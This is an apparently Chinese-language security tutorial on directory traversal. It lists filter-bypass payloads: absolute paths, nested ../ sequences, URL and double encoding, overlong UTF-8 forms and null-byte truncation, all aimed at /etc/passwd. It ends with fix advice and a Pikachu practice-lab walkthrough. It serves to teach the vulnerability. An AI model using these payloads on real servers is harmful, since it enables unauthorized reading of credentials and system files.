目录遍历
2022/9/12 23:25:44
本文主要是介绍目录遍历,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
目录遍历(也称为文件路径遍历)是一种 Web 安全漏洞,允许攻击者读取运行应用程序的服务器上的任意文件。
危害:
1、读取的文件可能包括应用程序代码和数据、后端系统的凭据以及敏感的操作系统文件等。
2、在某些情况下,攻击者可能能够写入服务器上的任意文件,从而允许他们修改应用程序数据或行为,并最终完全控制服务器
../ #返回上级目录
漏洞挖掘:
场景:图片
参数:URL中有这样特征的需要注意
?page=a.php
?home=b.html
?file=content
filename
绕过:
1、过滤../
方法:绝对路径:/etc/passwd
?filename=/etc/passwd
2、针对过滤../
构造../
?filename=....//....//....//etc/passwd
3、过滤../
方法:编码绕过(服务器能够解析的编码)
URL编码/URL双编码:%2e%2e%2f、%252e%252e%252f、..%252f ---- ../
%2e%2e%5c、%252e%252e%255c、..%255c ---- ..\
非标准编码: ..%c0%af、..%ef%bc%8f、..%co%af ---- ../
..%u2216、..%c1%9c ---- ..\
服务器能够解析的编码:如base64
4、目录限定(验证开始路径)
方法:使用特殊符号:~ 等
?filename=/var/www/images/../../../etc/passwd
?filename=~/../etc/passwd
5、验证文件拓展名
方法:截断后缀:%00、%0a、%20等等
?filename=../../../../../../../etc/passwd%00.jpg
?filename=../../../../../../../etc/passwd%0a.jpg
?filename=../../../../../../../etc/passwd%20
修复建议:
1、过滤../
2、验证白名单,如纯字母数字字符
3、目录限定:对最终的文件路径进行判断,确保请求文件完整目录后的头N个字符与文档根目录完全相同
打开pikachu靶场,目录遍历,点击”we're jarheads!“
打开靶场目录,在soup上一级创建1.txt,并写入内容
查看jarheads.php
这里直接把传进来的内容进行了require(),造成问题
通过构造路径,查询出1.txt的内容:../1.txt
成功显示出1.txt的内容
这篇关于目录遍历的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2025-01-06Spring Cloud Alibaba AI 入门与实践
- 2025-01-04敏捷管理与看板工具:提升研发、设计、电商团队工作效率的利器
- 2025-01-04智慧养老管理工具如何重塑养老生态?
- 2025-01-04如何打造高绩效销售团队:工具与管理方法的结合
- 2025-01-04解决电商团队协作难题,在线文档工具助力高效沟通
- 2025-01-04春节超市管理工具:解锁高效运营与顾客满意度的双重密码
- 2025-01-046种主流销售预测模型:如何根据场景选用最佳方案
- 2025-01-04外贸服务透明化:增强客户信任与合作的最佳实践
- 2025-01-04重新定义电商团队协作:在线文档工具的战略作用
- 2025-01-04Easysearch Java SDK 2.0.x 使用指南(三)